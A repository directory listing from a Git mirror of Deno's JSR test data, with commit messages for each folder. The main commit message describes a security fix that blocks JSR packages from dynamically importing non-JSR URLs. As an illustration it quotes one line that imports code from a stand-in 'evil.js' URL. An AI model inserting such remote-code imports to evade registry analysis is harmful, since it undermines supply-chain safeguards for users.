foster/denoland-deno
0
0
Fork 0
mirror of https://github.com/denoland/deno.git synced 2025-02-05 06:05:54 -05:00
Code Issues Packages 1 Wiki Activity
denoland-deno/tests/testdata/jsr/registry/@denotest
History
David Sherret 918c5e648f
fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623) 
A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.
2024-02-28 16:30:45 -05:00
..
add feat(lsp): jsr support with cache probing (#22418) 2024-02-14 22:48:39 +00:00
bad-manifest-checksum feat(unstable): single checksum per JSR package in the lockfile (#22421) 2024-02-15 14:49:35 -05:00
deps chore: move cli/tests/ -> tests/ (#22369) 2024-02-10 20:22:13 +00:00
import-https-url fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623) 2024-02-28 16:30:45 -05:00
module_graph fix(publish): better no-slow-types type discovery (#22517) 2024-02-21 14:12:36 -05:00
no_module_graph chore: move cli/tests/ -> tests/ (#22369) 2024-02-10 20:22:13 +00:00
subset_type_graph chore: move cli/tests/ -> tests/ (#22369) 2024-02-10 20:22:13 +00:00
subset_type_graph_invalid chore: move cli/tests/ -> tests/ (#22369) 2024-02-10 20:22:13 +00:00